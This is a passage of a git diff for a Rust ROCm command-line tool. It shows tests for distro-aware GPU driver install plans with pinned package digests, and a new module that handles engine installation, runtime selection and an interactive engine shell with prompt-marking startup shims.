fetch. + let mut env = scoped_rocdxg_env(); + + let plan = wsl_rocdxg_driver_plan(PrivilegeEscalation::Sudo); + assert_eq!(plan.repo_version, "1.2.2"); + let commands = plan.execution_commands().join("\n"); + // The version is resolved here, not deferred to the shell: the plan the + // user approves has to name the build the install will actually fetch. + // No `${...}` expansion survives into the commands at all — the digest + // is resolved at plan-build time too, which + // `wsl_rocdxg_download_is_verified_against_a_pinned_digest_by_default` + // asserts by name. + assert!( + !commands.contains("ROCM_CLI_ROCDXG_VERSION"), + "version must be resolved at plan-build time, not left as a shell template:\n{commands}" + ); + let occurrences = commands.matches("1.2.2").count(); + assert!( + occurrences >= 3, + "version should drive the deb name, the tag and the path; saw {occurrences}" + ); + + // An override has to reach every one of those references, including the + // release URL — the bug this guards is a URL left on the default. The + // digest comes along because an unpinned version is refused outright; + // see `wsl_rocdxg_refuses_a_version_whose_digest_is_unknown`. + env.set("ROCM_CLI_ROCDXG_VERSION", "9.9.9"); + env.set(ROCDXG_SHA256_ENV, &"b".repeat(64)); + let overridden = wsl_rocdxg_driver_plan(PrivilegeEscalation::Sudo); + assert_eq!(overridden.repo_version, "9.9.9"); + let commands = overridden.execution_commands().join("\n"); + assert!( + commands.contains("rocdxg-roct_9.9.9_amd64.deb"), + "{commands}" + ); + assert!( + commands.contains( + "https://github.com/ROCm/librocdxg/releases/download/v9.9.9/rocdxg-roct_9.9.9_amd64.deb" + ), + "{commands}" + ); + assert!( + !commands.contains("1.2.2"), + "override left a reference on the default version:\n{commands}" + ); + } + + // EAI-7406: distro selection must honor `/etc/os-release` `ID_LIKE`, so that + // Debian/Ubuntu-family and RHEL-rebuild derivatives that share their base + // version scheme are matched to the correct apt (`ubuntu/`) or EL + // (`el/`) plan instead of falling through to the unsupported plan. + + #[test] + fn driver_plan_ubuntu_derivative_via_id_like_matches_ubuntu_plan() { + let _env = ScopedTestEnv::with_amd_overrides_cleared(); + // Pop!_OS reports its own ID but reuses Ubuntu's version + repositories. + let os_release = r#" +ID=pop +VERSION_ID="22.04" +VERSION_CODENAME=jammy +ID_LIKE="ubuntu debian" +"#; + let plan = build_driver_install_plan( + &test_examine("linux", false), + os_release, + true, + PrivilegeEscalation::Sudo, + ); + let rendered = render_driver_install_plan(&plan, false, false); + + assert!(plan.supported); + assert!(plan.mutating); + assert_eq!(plan.policy, "linux_official_amd_dkms_wrapper"); + // Ubuntu-family derivatives ship the Ubuntu kernel, so linux-modules-extra applies. + assert!(rendered.contains("linux-modules-extra-$(uname -r)")); + assert!(rendered.contains("https://repo.radeon.com/graphics/7.2.4/ubuntu jammy main")); + assert!(rendered.contains("Execute: sudo apt-get install -y amdgpu-dkms")); + } + + #[test] + fn driver_plan_debian_derivative_via_id_like_matches_debian_plan() { + let _env = ScopedTestEnv::with_amd_overrides_cleared(); + // A Debian derivative (e.g. LMDE) that shares Debian's version scheme. + let os_release = r#" +ID=lmde +VERSION_ID="12" +ID_LIKE=debian +"#; + let plan = build_driver_install_plan( + &test_examine("linux", false), + os_release, + true, + PrivilegeEscalation::Sudo, + ); + let rendered = render_driver_install_plan(&plan, false, false); + + assert!(plan.supported); + // Debian-family maps to the Ubuntu jammy repo and omits linux-modules-extra. + assert!(rendered.contains("https://repo.radeon.com/graphics/7.2.4/ubuntu jammy main")); + assert!(!rendered.contains("linux-modules-extra-$(uname -r)")); + assert!(rendered.contains("amdgpu-dkms")); + } + + #[test] + fn driver_plan_almalinux_via_id_like_uses_el_9_flow() { + let _env = ScopedTestEnv::with_amd_overrides_cleared(); + // AlmaLinux is a RHEL rebuild: standard kernel, served from the el/ path. + let os_release = r#" +ID=almalinux +VERSION_ID="9.6" +ID_LIKE="rhel centos fedora" +"#; + let plan = build_driver_install_plan( + &test_examine("linux", false), + os_release, + true, + PrivilegeEscalation::Sudo, + ); + let rendered = render_driver_install_plan(&plan, false, false); + + assert!(plan.supported); + assert!(plan.mutating); + assert_eq!(plan.policy, "linux_official_amd_dkms_wrapper"); + // EL rebuilds use the vendor-neutral el/ repo path, not rhel/. + assert!(rendered.contains("repo.radeon.com/amdgpu-install/7.2.4/el/9.6/")); + assert!(!rendered.contains("/rhel/9.6/")); + assert!(rendered.contains("amdgpu-install-7.2.4.70204-1.el9.noarch.rpm")); + // el9 uses the version-aware standard-kernel prepare commands. + assert!(rendered.contains("kernel-devel-matched-$(uname -r)")); + assert!(rendered.contains("Execute: sudo dnf install -y amdgpu-dkms")); + } + + #[test] + fn driver_plan_almalinux_8_via_id_like_uses_el_major_path() { + let _env = ScopedTestEnv::with_amd_overrides_cleared(); + let os_release = r#" +ID=almalinux +VERSION_ID="8.10" +ID_LIKE="rhel centos fedora" +"#; + let plan = build_driver_install_plan( + &test_examine("linux", false), + os_release, + true, + PrivilegeEscalation::Sudo, + ); + let rendered = render_driver_install_plan(&plan, false, false); + + assert!(plan.supported); + // EL 8 is served from the major-version path (el/8), matching AMD docs. + assert!(rendered.contains("repo.radeon.com/amdgpu-install/7.2.4/el/8/")); + assert!(rendered.contains("-1.el8.noarch.rpm")); + // el8 has no kernel-devel-matched package. + assert!(!rendered.contains("kernel-devel-matched")); + assert!(rendered.contains("kernel-devel-$(uname -r)")); + } + + #[test] + fn driver_plan_id_like_with_unsupported_version_stays_unsupported() { + let _env = ScopedTestEnv::with_amd_overrides_cleared(); + // A Debian-family derivative whose VERSION_ID does not align with any + // AMD-documented Debian version must not fabricate a plan. + let os_release = r#" +ID=lmde +VERSION_ID="6" +ID_LIKE=debian +"#; + let plan = build_driver_install_plan( + &test_examine("linux", false), + os_release, + true, + PrivilegeEscalation::Sudo, + ); + let rendered = render_driver_install_plan(&plan, false, false); + + assert!(!plan.supported); + assert!(!plan.mutating); + assert!(rendered.contains("unsupported_linux_dkms_plan")); + assert!(!rendered.contains("amdgpu-dkms")); + } + + #[test] + fn driver_plan_exact_id_takes_precedence_over_id_like() { + let _env = ScopedTestEnv::with_amd_overrides_cleared(); + // An exact RHEL match must keep the rhel/ path even though ID_LIKE=fedora. + let os_release = r#" +ID=rhel +VERSION_ID="9.7" +ID_LIKE=fedora +"#; + let plan = build_driver_install_plan( + &test_examine("linux", false), + os_release, + true, + PrivilegeEscalation::Sudo, + ); + let rendered = render_driver_install_plan(&plan, false, false); + + assert!(plan.supported); + assert!(rendered.contains("repo.radeon.com/amdgpu-install/7.2.4/rhel/9.7/")); + assert!(!rendered.contains("/el/9.7/")); + } + + #[test] + fn driver_plan_oracle_linux_off_arm_version_stays_unsupported() { + let _env = ScopedTestEnv::with_amd_overrides_cleared(); + // Oracle Linux reports `ID_LIKE=fedora` (not rhel) and boots UEK. An OL + // version outside the exact `ol` arm must NOT be captured by the EL + // fallback, which would emit non-UEK kernel commands that cannot install. + let os_release = r#" +ID=ol +VERSION_ID="9.6" +ID_LIKE=fedora +"#; + let plan = build_driver_install_plan( + &test_examine("linux", false), + os_release, + true, + PrivilegeEscalation::Sudo, + ); + let rendered = render_driver_install_plan(&plan, false, false); + + assert!(!plan.supported); + assert!(!plan.mutating); + assert!(rendered.contains("unsupported_linux_dkms_plan")); + assert!(!rendered.contains("kernel-devel-matched")); + assert!(!rendered.contains("amdgpu-dkms")); + } + + #[test] + fn driver_plan_opensuse_leap_stays_unsupported() { + let _env = ScopedTestEnv::with_amd_overrides_cleared(); + // openSUSE Leap shares SLES's version scheme but has no SUSEConnect/SCC + // entitlement, so it must not be matched to the SLES plan. + let os_release = r#" +ID=opensuse-leap +VERSION_ID="15.7" +ID_LIKE="suse opensuse" +"#; + let plan = build_driver_install_plan( + &test_examine("linux", false), + os_release, + true, + PrivilegeEscalation::Sudo, + ); + let rendered = render_driver_install_plan(&plan, false, false); + + assert!(!plan.supported); + assert!(!plan.mutating); + assert!(rendered.contains("unsupported_linux_dkms_plan")); + assert!(!rendered.contains("SUSEConnect")); + assert!(!rendered.contains("amdgpu-dkms")); + } +} diff --git a/apps/rocm/src/engines_cmd.rs b/apps/rocm/src/engines_cmd.rs new file mode 100644 index 000000000..ebfff7416 --- /dev/null +++ b/apps/rocm/src/engines_cmd.rs @@ -0,0 +1,1072 @@ +// Copyright © Advanced Micro Devices, Inc., or its affiliates. +// +// SPDX-License-Identifier: MIT + +//! `rocm engines` command handlers and env-root/runtime resolution. +//! +//! Mechanically relocated from `main.rs` with no behavior change — the +//! `dispatch()` call site stays byte-identical (`engines(command)`, +//! re-imported via `use crate::engines_cmd::engines;`). `EnginesCommand` +//! remains in the crate root and is reached via `use crate::EnginesCommand`; +//! `Cli` is not referenced from this file. `engine_manages_own_runtime` is +//! called from `main.rs` and also from `serve_cmd.rs`; `ensure_self_managed_engine_ready`'s +//! only caller is `serve_cmd.rs`; the remaining env-root/runtime helpers here +//! are used only from other root-level commands in `main.rs` — all stay +//! `pub(crate)` rather than private either way. + +use std::fs; +use std::path::{Path, PathBuf}; +use std::process::{Command as ProcessCommand, Stdio}; + +use anyhow::{Context, Result, bail}; +use rocm_core::{ + AppPaths, RocmCliConfig, default_interactive_shell_program, interactive_terminal, + prepend_runtime_path, runtime_path_is_same_or_inside, runtime_python_activation_hint, + runtime_python_env_bin_dir, +}; +use rocm_engine_protocol::{ + DetectRequest, DetectResponse, EngineMethod, InstallRequest, InstallResponse, +}; +use serde::Deserialize; + +use crate::EnginesCommand; +use crate::therock; +use crate::{ + apply_app_path_env, engine_request, engine_request_with_env_root, ensure_libatomic_for_torch, + ensure_libnuma_for_torch, ensure_openmpi_for_vllm, normalize_path_for_compare, + record_cli_audit_event, recover_setup_runtime_registration, + render_engine_inventory_text_with_paths, resolve_engine_selection, + resolve_runtime_selector_to_exact_key, select_runtime_manifest, settle_engine_install, + validate_engine_selection_runtime, validate_runtime_manifest_for_activation, +}; + +pub(crate) fn render_engine_inventory_text() -> String { + let paths = AppPaths::discover().ok(); + render_engine_inventory_text_with_paths(paths.as_ref()) +} + +fn path_is_same_or_inside(path: &Path, base: &Path) -> bool { + let path = normalize_path_for_compare(path); + let base = normalize_path_for_compare(base); + runtime_path_is_same_or_inside(&path, &base) +} + +pub(crate) fn engines(command: EnginesCommand) -> Result<()> { + match command { + EnginesCommand::List => { + print!("{}", render_engine_inventory_text()); + Ok(()) + } + EnginesCommand::Install { + engine, + runtime_id, + python_version, + reinstall, + yes, + } => { + let paths = AppPaths::discover()?; + let mut config = RocmCliConfig::load(&paths)?; + let runtime_id = + resolve_engine_install_runtime_id(&paths, &config, &engine, runtime_id)?; + let env_root = env_root_for_engine_install(&paths, &config, &engine, &runtime_id)?; + if engine == "vllm" { + ensure_openmpi_for_vllm(yes)?; + ensure_libatomic_for_torch(yes); + ensure_libnuma_for_torch(yes); + } + let response = engine_request_with_env_root::<_, InstallResponse>( + Some(&paths), + &engine, + EngineMethod::Install, + &InstallRequest { + runtime_id: runtime_id.clone(), + python_version, + reinstall, + env_root: env_root.clone(), + }, + env_root.as_deref(), + )?; + println!("engine install"); + println!(" engine: {engine}"); + println!(" runtime_id: {runtime_id}"); + println!(" reinstall: {reinstall}"); + println!(" env_id: {}", response.env_id); + println!(" env_path: {}", response.env_path); + for warning in &response.warnings { + println!(" warning: {warning}"); + } + if response.managed_env == Some(false) { + println!(" note: external runtime"); + } else { + let engine_config = config.engine_config_mut(&engine); + engine_config.last_installed_runtime_id = Some(runtime_id.clone()); + engine_config.last_installed_env_id = Some(response.env_id.clone()); + let mut seeded_preference = false; + if engine_config.preferred_runtime_id.is_none() + && engine_config.preferred_env_id.is_none() + { + engine_config.preferred_env_id = Some(response.env_id.clone()); + seeded_preference = true; + } + config.save(&paths)?; + let _ = seeded_preference; + } + // Settle last, matching `maybe_auto_install_sdk_preferred_engine`. The + // check blocks then print under the `engine:`/`runtime_id:`/`env_id:` + // lines they describe instead of above them, and the config bookkeeping + // above still lands when settling fails — the engine did install; it is + // the runtime it left behind that is being reported on. + settle_engine_install(&paths, &engine, &runtime_id, &response)?; + record_cli_audit_event( + &paths, + "engine", + "engine_install", + "info", + format!( + "installed engine={} runtime_id={} env_id={} reinstall={}", + engine, runtime_id, response.env_id, reinstall + ), + None, + ); + Ok(()) + } + EnginesCommand::Shell { + engine, + runtime_id, + env_id, + shell, + } => engine_shell( + &engine, + runtime_id.as_deref(), + env_id.as_deref(), + shell.as_deref(), + ), + } +} + +fn resolve_engine_install_runtime_id( + paths: &AppPaths, + config: &RocmCliConfig, + engine: &str, + runtime_id: Option, +) -> Result { + if engine_manages_own_runtime(engine) { + return Ok(runtime_id.unwrap_or_else(|| managed_engine_runtime_id(engine))); + } + let Some(selector) = runtime_id + .or_else(|| config.active_runtime_key.clone()) + .or_else(|| config.default_runtime_id.clone()) + else { + bail!( + "no active ROCm runtime is configured; run `rocm runtimes list` and `rocm runtimes activate `, or pass --runtime-id" + ); + }; + resolve_runtime_selector_to_exact_key(paths, &selector, "engine install runtime selection") +} + +pub(crate) fn engine_manages_own_runtime(engine: &str) -> bool { + engine == "lemonade" +} + +fn env_root_for_runtime( + paths: &AppPaths, + engine: &str, + runtime_id: &str, +) -> Result> { + if engine_manages_own_runtime(engine) { + return Ok(None); + } + let manifests = therock::load_runtime_manifests(paths)?; + let manifest = select_runtime_manifest(&manifests, runtime_id)?; + Ok(Some(manifest.install_root.join("engines"))) +} + +pub(crate) fn env_root_for_engine_install( + paths: &AppPaths, + config: &RocmCliConfig, + engine: &str, + runtime_id: &str, +) -> Result> { + if engine_manages_own_runtime(engine) { + return env_root_for_self_managed_engine(paths, config); + } + env_root_for_runtime(paths, engine, runtime_id) +} + +fn env_root_for_self_managed_engine( + paths: &AppPaths, + config: &RocmCliConfig, +) -> Result> { + recover_setup_runtime_registration(paths, config)?; + let manifests = therock::load_runtime_manifests(paths)?; + for selector in [ + config.active_runtime_key.as_deref(), + config.default_runtime_id.as_deref(), + ] + .into_iter() + .flatten() + { + if let Some(manifest) = runtime_manifest_for_selector(&manifests, selector) { + return Ok(Some(manifest.install_root.join("engines"))); + } + } + let ready = manifests + .iter() + .filter(|manifest| validate_runtime_manifest_for_activation(manifest).is_ok()) + .collect::>(); + Ok(match ready.as_slice() { + [manifest] => Some(manifest.install_root.join("engines")), + _ => None, + }) +} + +pub(crate) fn runtime_manifest_for_selector<'a>( + manifests: &'a [therock::InstalledRuntimeManifest], + selector: &str, +) -> Option<&'a therock::InstalledRuntimeManifest> { + manifests + .iter() + .find(|manifest| manifest.runtime_key.eq_ignore_ascii_case(selector)) + .or_else(|| { + let mut matches = manifests + .iter() + .filter(|manifest| manifest.runtime_id.eq_ignore_ascii_case(selector)); + let first = matches.next()?; + if matches.next().is_none() { + Some(first) + } else { + None + } + }) +} + +/// The `runtime_key` of the runtime whose install root contains `python`. +pub(crate) fn runtime_key_for_python(paths: &AppPaths, python: &Path) -> Option { + let manifests = therock::load_runtime_manifests(paths).ok()?; + runtime_key_owning_python(&manifests, python).map(str::to_owned) +} + +/// Which runtime owns an interpreter, decided by install root. +/// +/// Split from the registry read so the decision can be tested without a +/// registry on disk, matching `sdk_torch_build_from_manifest`. +/// +/// `runtime_id` cannot answer this: it is shared by every side-by-side install +/// of one channel and family, which is exactly the situation an engine install +/// has to be attributed in. An install root contains one runtime by +/// construction, so the interpreter's path settles it. +/// +/// Both sides are compared verbatim *and* canonicalized. The CLI writes +/// `install_root` canonicalized while an engine adapter reports back whatever +/// path it was handed, and comparing a single form makes ownership fail +/// silently on a symlinked runtimes directory. Roots can nest, so the longest +/// containing root wins. +fn runtime_key_owning_python<'a>( + manifests: &'a [therock::InstalledRuntimeManifest], + python: &Path, +) -> Option<&'a str> { + fn both_forms(path: &Path) -> Vec { + let verbatim = path.to_path_buf(); + match path.canonicalize() { + Ok(resolved) if resolved != verbatim => vec![verbatim, resolved], + _ => vec![verbatim], + } + } + + let pythons = both_forms(python); + manifests + .iter() + .filter(|manifest| { + both_forms(&manifest.install_root) + .iter() + .any(|root| pythons.iter().any(|python| python.starts_with(root))) + }) + .max_by_key(|manifest| manifest.install_root.as_os_str().len()) + .map(|manifest| manifest.runtime_key.as_str()) +} + +pub(crate) fn env_root_for_service( + paths: &AppPaths, + engine: &str, + runtime_id: Option<&str>, + env_id: Option<&str>, +) -> Result> { + if env_id.is_some() { + return Ok(None); + } + match runtime_id { + Some(runtime_id) => env_root_for_runtime(paths, engine, runtime_id), + None => Ok(None), + } +} + +/// Label recorded for the runtime a self-managing engine installs for itself. +/// +/// For `lemonade` this must be the `env_id` its adapter reports, which is +/// derived from the single Lemonade pin — it was previously a hand-written +/// literal and had drifted several minor versions behind what is installed. +fn managed_engine_runtime_id(engine: &str) -> String { + match engine { + "lemonade" => format!("lemonade-embeddable-{}", rocm_deps::LEMONADE_VERSION), + _ => "managed-engine-runtime".to_owned(), + } +} + +pub(crate) fn ensure_self_managed_engine_ready( + paths: &AppPaths, + config: &mut RocmCliConfig, + engine: &str, +) -> Result<()> { + if !engine_manages_own_runtime(engine) { + return Ok(()); + } + let runtime_id = managed_engine_runtime_id(engine); + let env_root = env_root_for_self_managed_engine(paths, config)?; + let detect = engine_request::<_, DetectResponse>( + Some(paths), + engine, + EngineMethod::Detect, + &DetectRequest { + runtime_id: Some(runtime_id.clone()), + device_filter: None, + }, + ) + .ok(); + // For a self-managing engine the runtime id *is* the env id its adapter + // reports for the pinned version, so a version bump leaves an older + // install detected-but-not-current. Requiring the ids to match makes the + // bump trigger an install instead of silently keeping the old runtime. + let installed = detect.as_ref().is_some_and(|detect| { + detect.installed + && detect.env_id.as_deref() == Some(runtime_id.as_str()) + && detect_runtime_matches_env_root(detect, env_root.as_deref()) + }); + let response = if installed { + None + } else { + eprintln!("Preparing {engine} for GPU serving..."); + let response = engine_request_with_env_root::<_, InstallResponse>( + Some(paths), + engine, + EngineMethod::Install, + &InstallRequest { + runtime_id: runtime_id.clone(), + python_version: None, + reinstall: false, + env_root: env_root.clone(), + }, + env_root.as_deref(), + )?; + // No `settle_engine_install` here. This function returns at the top unless + // `engine_manages_own_runtime(engine)`, and that is exactly the case + // `settles_runtime_torch` declines: the runtime holds the engine's own + // binary, not an interpreter with a torch in it. Calling it would be inert + // at best, and a call that provably cannot act invites someone to "fix" the + // gate later. + Some(response) + }; + + let engine_config = config.engine_config_mut(engine); + engine_config.last_installed_runtime_id = Some(runtime_id); + if let Some(response) = response { + engine_config.last_installed_env_id = Some(response.env_id.clone()); + if engine_config.preferred_runtime_id.is_none() && engine_config.preferred_env_id.is_none() + { + engine_config.preferred_env_id = Some(response.env_id); + } + } + config.save(paths)?; + Ok(()) +} + +fn detect_runtime_matches_env_root(detect: &DetectResponse, env_root: Option<&Path>) -> bool { + let Some(env_root) = env_root else { + return true; + }; + detect + .runtime_executable + .as_deref() + .map(PathBuf::from) + .is_some_and(|runtime_executable| path_is_same_or_inside(&runtime_executable, env_root)) +} + +#[derive(Debug, Clone, Deserialize)] +struct ManagedEngineEnvManifest { + env_id: String, + runtime_id: String, + python_executable: String, + env_path: PathBuf, +} + +#[derive(Debug, Clone)] +struct ResolvedEngineEnv { + env_id: String, + runtime_id: String, + python_executable: String, + env_path: PathBuf, + source: String, +} + +/// Extra argv, environment, and files needed to make a spawned shell *look* +/// like a managed engine shell. +#[derive(Debug, Clone, PartialEq, Eq)] +struct ShellPromptShim { + /// Appended to the shell's argv. + args: Vec, + /// Added to the child environment. + envs: Vec<(String, String)>, + /// Written before the shell starts, as (path, contents). + files: Vec<(PathBuf, String)>, +} + +/// Work out how to mark `shell_program`'s prompt with `prompt`. +/// +/// Passing the marker through the `PS1` *environment variable* does not work: +/// bash assigns `PS1` from `/etc/bash.bashrc` and `~/.bashrc` on every +/// interactive start, so the inherited value is overwritten and the engine shell +/// ends up looking exactly like the shell it was launched from. The marker has to +/// be applied from inside the shell's own startup, after the user's files have +/// run — which is what these shims do. +/// +/// Pure: decides *what* to write and *how* to invoke, and leaves the I/O to the +/// caller so the decision can be unit-tested. Returns `None` for shells that +/// cannot be marked safely; the caller's handover banner covers those instead of +/// this failing. +/// +/// `original_zdotdir` is the caller's `ZDOTDIR`, if it had one, so the zsh shim +/// can still find the user's real startup files after we redirect `ZDOTDIR` at +/// our own directory. +fn engine_shell_prompt_shim( + shell_program: &str, + prompt: &str, + shim_dir: &Path, + original_zdotdir: Option<&str>, +) -> Option { + // Match on the file stem so `--shell /usr/bin/zsh` and a bare `bash` behave + // the same. `bash5`-style names are deliberately not matched: guessing wrong + // is worse than falling back to the banner. + let stem = Path::new(shell_program) + .file_stem() + .and_then(std::ffi::OsStr::to_str)? + .to_ascii_lowercase(); + + match stem.as_str() { + "bash" => { + let rcfile = shim_dir.join("engine-shell.bash"); + // `--rcfile` replaces ~/.bashrc ONLY -- bash still sources + // /etc/bash.bashrc itself, so sourcing that here would apply it twice. + let contents = format!( + "# Generated by `rocm engines shell`. Sources your own startup file\n\ + # first, then marks the prompt so this shell is distinguishable.\n\ + if [ -r \"$HOME/.bashrc\" ]; then . \"$HOME/.bashrc\"; fi\n\ + PS1='{prompt}'\"$PS1\"\n" + ); + Some(ShellPromptShim { + args: vec![ + "--rcfile".to_owned(), + rcfile.display().to_string(), + "-i".to_owned(), + ], + envs: Vec::new(), + files: vec![(rcfile, contents)], + }) + } + "zsh" => { + // Redirecting ZDOTDIR makes zsh skip the user's `.zshenv` AND their + // `.zshrc`. Losing `.zshenv` would silently strip their PATH and + // exports -- a worse bug than the unmarked prompt -- so both are + // restored, and the original location is passed through for the shim + // to read at startup. + let user_zdotdir = "${ROCM_CLI_ORIG_ZDOTDIR:-$HOME}"; + let zshenv = format!( + "# Generated by `rocm engines shell`; restores your own .zshenv.\n\ + __rocm_zdotdir=\"{user_zdotdir}\"\n\ + [ -r \"$__rocm_zdotdir/.zshenv\" ] && . \"$__rocm_zdotdir/.zshenv\"\n" + ); + let zshrc = format!( + "# Generated by `rocm engines shell`. Sources your own .zshrc first,\n\ + # then marks the prompt so this shell is distinguishable.\n\ + __rocm_zdotdir=\"{user_zdotdir}\"\n\ + [ -r \"$__rocm_zdotdir/.zshrc\" ] && . \"$__rocm_zdotdir/.zshrc\"\n\ + PROMPT='{prompt}'$PROMPT\n" + ); + let mut envs = vec![("ZDOTDIR".to_owned(), shim_dir.display().to_string())]; + if let Some(original) = original_zdotdir.filter(|value| !value.trim().is_empty()) { + envs.push(("ROCM_CLI_ORIG_ZDOTDIR".to_owned(), original.to_owned())); + } + Some(ShellPromptShim { + args: Vec::new(), + envs, + files: vec![ + (shim_dir.join(".zshenv"), zshenv), + (shim_dir.join(".zshrc"), zshrc), + ], + }) + } + // fish, sh, dash, cmd, PowerShell, anything else: no safe way to inject a + // marker without taking over startup, so the banner carries the message. + _ => None, + } +} + +/// Write a [`ShellPromptShim`]'s files, creating the directory if needed. +/// +/// The files live under the app's own engine state directory rather than a temp +/// dir: they must outlive this process's setup and stay readable for the whole +/// life of the spawned shell, and a fixed path is regenerated on every run +/// instead of accumulating. +fn write_engine_shell_shim(shim_dir: &Path, shim: &ShellPromptShim) -> Result<()> { + fs::create_dir_all(shim_dir) + .with_context(|| format!("failed to create {}", shim_dir.display()))?; + for (path, contents) in &shim.files { + fs::write(path, contents).with_context(|| format!("failed to write {}", path.display()))?; + } + Ok(()) +} + +fn engine_shell( + engine: &str, + runtime_id: Option<&str>, + env_id: Option<&str>, + shell_override: Option<&str>, +) -> Result<()> { + if !interactive_terminal() { + bail!("`rocm engines shell` requires an interactive terminal"); + } + + let paths = AppPaths::discover()?; + let config = RocmCliConfig::load(&paths)?; + let resolved = resolve_engine_env(&paths, &config, engine, runtime_id, env_id)?; + let shell_program = shell_override + .map(str::to_owned) + .or_else(default_interactive_shell_program) + .context("unable to determine an interactive shell; set --shell or SHELL")?; + let venv_bin = runtime_python_env_bin_dir(&resolved.env_path); + let shell_hint = runtime_python_activation_hint(&resolved.env_path); + + println!("engine shell"); + println!(" engine: {engine}"); + println!(" source: {}", resolved.source); + println!(" env_id: {}", resolved.env_id); + println!(" runtime_id: {}", resolved.runtime_id); + println!(" env_path: {}", resolved.env_path.display()); + println!(" python: {}", resolved.python_executable); + println!(" shell: {shell_program}"); + println!(" activate_hint: {shell_hint}"); + println!(" exit_hint: use `exit` or Ctrl-D to leave the managed env shell"); + + let path_with_env = prepend_runtime_path(&venv_bin, std::env::var_os("PATH").as_deref()) + .context("failed to compose PATH for managed engine env shell")?; + let mut command = ProcessCommand::new(&shell_program); + command + .stdin(Stdio::inherit()) + .stdout(Stdio::inherit()) + .stderr(Stdio::inherit()) + .env("VIRTUAL_ENV", &resolved.env_path) + .env("PATH", path_with_env) + .env("ROCM_CLI_ENGINE", engine) + .env("ROCM_CLI_ENV_ID", &resolved.env_id) + .env("ROCM_CLI_RUNTIME_ID", &resolved.runtime_id) + .env("ROCM_CLI_PYTHON", &resolved.python_executable); + apply_app_path_env(&mut command, &paths); + + let prompt = format!("(rocm:{engine}) "); + let mut prompt_marked = false; + if !rocm_core::runtime_is_windows() { + // Kept for prompt frameworks (starship, powerlevel10k, oh-my-posh) that + // read this directly -- that is why the missing marker went unnoticed by + // anyone using one. Plain bash/zsh need the shim below. + command.env("VIRTUAL_ENV_PROMPT", &prompt); + + let shim_dir = paths.engine_state_dir(engine).join("shell"); + // `engine` is constrained by clap to the supported-engine list, so the + // prompt cannot carry shell metacharacters into the generated files. + if let Some(shim) = engine_shell_prompt_shim( + &shell_program, + &prompt, + &shim_dir, + std::env::var("ZDOTDIR").ok().as_deref(), + ) { + // A shim that cannot be written is not worth failing the command over + // -- the shell still works, it just looks unmarked, and the banner + // below adapts to say so. + match write_engine_shell_shim(&shim_dir, &shim) { + Ok(()) => { + command.args(&shim.args); + for (key, value) in &shim.envs { + command.env(key, value); + } + prompt_marked = true; + } + Err(error) => { + eprintln!("warning: could not prepare the engine shell prompt: {error}"); + } + } + } + + if !prompt_marked { + // Shells we have no shim for (sh, dash) do honour an inherited PS1, so + // this is still worth setting -- but as a self-contained value. The + // previous `{prompt}${PS1:-}` referred to the variable being assigned, + // which dash expanded into itself and rendered as + // `(rocm:vllm) (rocm:vllm) ${PS1:-}`. Shells that ignore PS1 entirely + // (fish) are unaffected either way. + command.env("PS1", format!("{prompt}$ ")); + } + } + + // The block above describes the environment; this is the handover. Without + // it, a shell we could not mark is indistinguishable from the parent and + // reads as "the command only printed information" -- which is how this was + // reported. + println!(); + if prompt_marked { + println!("Entering the {engine} engine shell — your prompt is now prefixed {prompt}"); + } else { + println!( + "Entering the {engine} engine shell — your prompt may look unchanged; \ + run `echo $ROCM_CLI_ENGINE` to confirm you are inside it." + ); + } + println!("Run `exit` (or Ctrl-D) to return to your previous shell."); + + let status = command + .status() + .with_context(|| format!("failed to launch shell `{shell_program}`"))?; + if status.success() { + Ok(()) + } else { + bail!("managed engine shell exited with status {status}"); + } +} + +fn resolve_engine_env( + paths: &AppPaths, + config: &RocmCliConfig, + engine: &str, + runtime_id: Option<&str>, + env_id: Option<&str>, +) -> Result { + let selection = validate_engine_selection_runtime( + paths, + resolve_engine_selection(config, engine, runtime_id, env_id), + )?; + if let Some(env_id) = selection.env_id.as_deref() { + let manifest = load_engine_env_manifest(paths, engine, env_id)?; + return Ok(ResolvedEngineEnv { + env_id: manifest.env_id, + runtime_id: manifest.runtime_id, + python_executable: manifest.python_executable, + env_path: manifest.env_path, + source: selection + .source + .unwrap_or_else(|| "manifest_env_id".to_owned()), + }); + } + + let runtime_id = selection.runtime_id.with_context(|| { + "no active ROCm runtime is configured; run `rocm runtimes list` and `rocm runtimes activate `, or pass --runtime-id" + })?; + let env_root = env_root_for_engine_install(paths, config, engine, &runtime_id)?; + let response = engine_request_with_env_root::<_, InstallResponse>( + Some(paths), + engine, + EngineMethod::Install, + &InstallRequest { + runtime_id: runtime_id.clone(), + python_version: None, + reinstall: false, + env_root: env_root.clone(), + }, + env_root.as_deref(), + )?; + settle_engine_install(paths, engine, &runtime_id, &response)?; + Ok(ResolvedEngineEnv { + env_id: response.env_id, + runtime_id, + python_executable: response.python_executable, + env_path: PathBuf::from(response.env_path), + source: selection + .source + .unwrap_or_else(|| "auto_install".to_owned()), + }) +} + +fn load_engine_env_manifest( + paths: &AppPaths, + engine: &str, + env_id: &str, +) -> Result { + let path = paths + .engine_manifests_dir(engine) + .join(format!("{env_id}.json")); + let bytes = fs::read(&path).with_context(|| format!("failed to read {}", path.display()))?; + serde_json::from_slice(&bytes).with_context(|| format!("failed to parse {}", path.display())) +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::tests::{test_paths, test_runtime_manifest_for_update, write_test_pip_runtime}; + + /// Two runtimes installed side by side, as a pre-warmed CI tree holds them. + /// + /// They differ in `runtime_key`, `version` and install root, and share one + /// `runtime_id` — that is what the field means, so this is not a corrupt + /// registry. + fn side_by_side_runtimes() -> Vec { + let mut older = test_runtime_manifest_for_update( + "release-wheel-gfx94x-dcgpu-7-13-0", + "therock-release:gfx94X-dcgpu", + "gfx94X-dcgpu", + "7.13.0", + ); + older.install_root = PathBuf::from("/runtimes/release-wheel-gfx94x-dcgpu-7-13-0"); + let mut newer = test_runtime_manifest_for_update( + "release-wheel-gfx94x-dcgpu-7-14-0", + "therock-release:gfx94X-dcgpu", + "gfx94X-dcgpu", + "7.14.0", + ); + newer.install_root = PathBuf::from("/runtimes/release-wheel-gfx94x-dcgpu-7-14-0"); + vec![older, newer] + } + + #[test] + fn engine_install_runtime_selection_requires_configured_runtime() -> Result<()> { + let (root, paths) = test_paths("engine-install-runtime-selection"); + let error = + resolve_engine_install_runtime_id(&paths, &RocmCliConfig::default(), "vllm", None) + .unwrap_err() + .to_string(); + assert!(error.contains("no active ROCm runtime is configured")); + assert_eq!( + resolve_engine_install_runtime_id(&paths, &RocmCliConfig::default(), "lemonade", None)?, + format!("lemonade-embeddable-{}", rocm_deps::LEMONADE_VERSION), + ); + 